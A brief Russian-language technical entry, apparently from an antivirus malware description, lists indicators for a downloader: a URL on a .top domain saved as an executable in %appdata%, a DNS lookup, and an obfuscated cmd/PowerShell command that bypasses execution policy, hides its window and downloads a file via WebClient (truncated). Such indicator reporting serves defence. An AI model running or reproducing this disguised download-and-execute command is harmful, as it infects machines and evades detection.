Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^w^ErSheLL.ExE ^-EXe^cUT^iONP^o^LIC^Y^ ^byPas^S^ -NO^Pr^Of^i^LE^ ^-wi^nD^o^w^st^Yle hI^dDE^N (NeW-^O^bJ^eCt^ ^Sys^teM^.^N^Et.WEBCL^Ie^NT)^.D^Own^LO^A^dfilE('http://www....
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "PO^w^ErSheLL.ExE ^-EXe^cUT^iONP^o^LIC^Y^ ^byPas^S^ -NO^Pr^Of^i^LE^ ^-wi^nD^o^w^st^Yle hI^dDE^N (NeW-^O^bJ^eCt^ ^Sys^teM^.^N^Et.WEBCL^Ie^NT)^.D^Own^LO^A^dfilE('http://www....' (со скрытым окном)